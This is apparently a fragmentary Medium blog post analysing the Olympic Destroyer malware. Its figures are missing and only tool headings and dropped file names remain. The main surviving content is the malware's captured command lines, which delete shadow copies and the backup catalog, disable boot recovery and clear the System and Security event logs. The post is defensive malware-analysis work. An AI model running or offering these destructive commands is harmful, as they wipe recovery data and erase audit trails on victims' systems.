Malware Analysis — Olympic Destroyer

Image from WIRED article. Illustration: Joan Wong

PEStudio:

IDA

Dynamic Analysis of Olympic Destroyer

Procmon:

FXRBH.exe

_exw.exe

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System

C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security

_stt.exe

_gur.exe

System Stealer

--

--

--

cyber security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Three New NFTs released on BSC

FBI Starts Securing Organisations against ProxyLogon 👮‍♂️, Clubhouse Data Dump🏡, iOS Game…

Warp Introduces Voting and Fee Sharing token, veWarp

PoLido is live on Goerli Testnet!

The First Nomo Player Token Drop

AMPnet/APX Update: Launch on DuckSTARTER, APX TGE & Platform Going Live

Basic Business Email Security; The Disaster Waiting to Happen for Kenyan Banks

How to choose an Intrusion Detection System

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jon

Jon

cyber security

More from Medium

[RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator

Malware Analysis —Banking Trojan: Dyre

TryHackMe-Mobile Malware Analysis | By Subhadip Nag(Mrl0s3r)

CyberDefenders Write-up: Injector